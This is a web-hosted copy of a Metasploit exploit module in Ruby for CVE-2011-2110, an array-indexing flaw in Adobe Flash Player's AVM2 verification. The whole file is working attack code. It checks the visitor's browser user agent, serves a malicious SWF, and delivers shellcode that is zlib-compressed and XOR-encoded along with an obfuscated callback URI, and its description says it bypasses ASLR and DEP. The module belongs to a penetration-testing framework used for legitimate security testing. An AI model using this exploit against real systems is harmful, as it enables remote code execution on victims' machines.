Book a Demo!
CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutPoliciesSign UpSign In
rapid7
GitHub Repository: rapid7/metasploit-framework
 Path: blob/master/modules/exploits/windows/browser/adobe_flashplayer_arrayindexing.rb
19566 views
1
##

2
# This module requires Metasploit: https://metasploit.com/download

3
# Current source: https://github.com/rapid7/metasploit-framework

4
##

5


6
class MetasploitModule < Msf::Exploit::Remote

7
  Rank = GreatRanking

8


9
  include Msf::Exploit::Remote::HttpServer::HTML

10


11
  def initialize(info = {})

12
    super(

13
      update_info(

14
        info,

15
        'Name' => 'Adobe Flash Player AVM Verification Logic Array Indexing Code Execution',

16
        'Description' => %q{

17
          This module exploits a vulnerability in Adobe Flash Player versions 10.3.181.23

18
          and earlier. This issue is caused by a failure in the ActionScript3 AVM2 verification

19
          logic. This results in unsafe JIT(Just-In-Time) code being executed. This is the same

20
          vulnerability that was used for attacks against Korean based organizations.

21


22
          Specifically, this issue occurs when indexing an array using an arbitrary value,

23
          memory can be referenced and later executed. Taking advantage of this issue does not rely

24
          on heap spraying as the vulnerability can also be used for information leakage.

25


26
          Currently this exploit works for IE6, IE7, IE8, Firefox 10.2 and likely several

27
          other browsers under multiple Windows platforms. This exploit bypasses ASLR/DEP and

28
          is very reliable.

29
        },

30
        'License' => MSF_LICENSE,

31
        'Author' => [

32
          'mr_me <steventhomasseeley[at]gmail.com>', # msf exploit

33
          'Unknown' # malware version seen used in targeted attacks

34
        ],

35
        'References' => [

36
          ['CVE', '2011-2110'],

37
          ['OSVDB', '73007'],

38
          ['BID', '48268'],

39
          ['URL', 'http://www.adobe.com/devnet/swf.html'],

40
          ['URL', 'http://www.adobe.com/support/security/bulletins/apsb11-18.html'],

41
          ['URL', 'http://www.accessroot.com/arteam/site/download.php?view.331'],

42
          ['URL', 'http://www.shadowserver.org/wiki/pmwiki.php/Calendar/20110617'],

43
        ],

44
        'DefaultOptions' => {

45
          'EXITFUNC' => 'process',

46
          'HTTP::compression' => 'gzip',

47
          'HTTP::chunked' => true,

48
          'InitialAutoRunScript' => 'post/windows/manage/priv_migrate'

49
        },

50
        'Payload' => {

51
          'Space' => 2000,

52
          'BadChars' => "\x00",

53
          'DisableNops' => true

54
        },

55
        'Platform' => 'win',

56
        'Targets' => [

57
          [ 'Automatic', {}],

58
        ],

59
        'DisclosureDate' => '2012-06-21',

60
        'DefaultTarget' => 0,

61
        'Notes' => {

62
          'Reliability' => UNKNOWN_RELIABILITY,

63
          'Stability' => UNKNOWN_STABILITY,

64
          'SideEffects' => UNKNOWN_SIDE_EFFECTS

65
        }

66
      )

67
    )

68
  end

69


70
  def exploit

71
    # src for the flash file: external/source/exploits/CVE-2011-2110/CVE-2011-2110.as

72
    # full aslr/dep bypass using the info leak as per malware

73
    path = File.join(Msf::Config.data_directory, "exploits", "CVE-2011-2110.swf")

74
    fd = File.open(path, "rb")

75
    @swf = fd.read(fd.stat.size)

76
    fd.close

77
    super

78
  end

79


80
  def check_dependencies

81
    use_zlib

82
  end

83


84
  def get_target(agent)

85
    # If the user is already specified by the user, we'll just use that

86
    return target if target.name != 'Automatic'

87


88
    if agent =~ /MSIE/

89
      return targets[0]  # ie 6/7/8 tested working

90
    elsif agent =~ /Firefox/

91
      return targets[0]  # ff 10.2 tested working

92
    else

93
      return nil

94
    end

95
  end

96


97
  def on_request_uri(cli, request)

98
    agent = request.headers['User-Agent']

99
    my_target = get_target(agent)

100


101
    # Avoid the attack if the victim doesn't have the same setup we're targeting

102
    if my_target.nil?

103
      print_error("#{cli.peerhost}:#{cli.peerport} - Browser not supported: #{agent.to_s}")

104
      send_not_found(cli)

105
      return

106
    end

107


108
    xor_byte = 122

109
    trigger = @swf

110
    trigger_file = rand_text_alpha(rand(6) + 3) + ".swf"

111
    code = rand_text_alpha(rand(6) + 3) + ".txt"

112


113
    sc = Zlib::Deflate.deflate(payload.encoded)

114
    shellcode = ""

115


116
    sc.each_byte do |c|

117
      shellcode << (xor_byte ^ c)

118
    end

119


120
    uri = ((datastore['SSL']) ? "https://" : "http://")

121
    uri << ((datastore['SRVHOST'] == '0.0.0.0') ? Rex::Socket.source_address('50.50.50.50') : datastore['SRVHOST'])

122
    uri << ":#{datastore['SRVPORT']}#{get_resource()}/#{code}"

123


124
    bd_uri = Zlib::Deflate.deflate(uri)

125


126
    uri = ""

127
    bd_uri.each_byte do |c|

128
      uri << (xor_byte ^ c)

129
    end

130


131
    bd_uri = uri.unpack("H*")[0]

132


133
    obj_id = rand_text_alpha(rand(6) + 3)

134


135
    if request.uri.match(/\.swf/i)

136
      print_status("Sending malicious swf")

137
      send_response(cli, trigger, { 'Content-Type' => 'application/x-shockwave-flash' })

138
      return

139
    end

140


141
    if request.uri.match(/\.txt/i)

142
      print_status("Sending payload")

143
      send_response(cli, shellcode, { 'Content-Type' => 'text/plain' })

144
      return

145
    end

146


147
    html = <<-EOS

148
    <html>

149
    <head>

150
    </head>

151
    <body>

152
    <center>

153
    <object classid="clsid:D27CDB6E-AE6D-11cf-96B8-444553540000"

154
    id="#{obj_id}" width="600" height="400"

155
    codebase="http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab">

156
    <param name="movie" value="#{get_resource}/#{trigger_file}?info=#{bd_uri}" />

157
    <embed src="#{get_resource}/#{trigger_file}?info=#{bd_uri}" quality="high"

158
    width="320" height="300" name="#{obj_id}" align="middle"

159
    allowNetworking="all"

160
    type="application/x-shockwave-flash"

161
    pluginspage="http://www.macromedia.com/go/getflashplayer">

162
    </embed>

163
    </object>

164
    </center>

165
    </body>

166
    </html>

167
    EOS

168


169
    html = html.gsub(/^ {4}/, '')

170


171
    print_status("Sending #{self.name} HTML")

172
    send_response(cli, html, { 'Content-Type' => 'text/html' })

173
  end

174
end

175


176